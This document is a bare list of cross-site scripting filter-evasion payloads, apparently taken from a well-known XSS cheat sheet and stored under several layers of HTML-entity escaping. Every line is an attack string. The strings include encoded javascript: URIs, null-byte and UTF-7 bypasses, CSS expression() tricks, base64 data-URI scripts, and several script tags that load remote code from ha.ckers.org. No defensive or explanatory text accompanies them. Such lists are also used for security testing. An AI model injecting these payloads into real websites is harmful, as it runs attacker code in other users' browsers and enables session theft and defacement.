&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
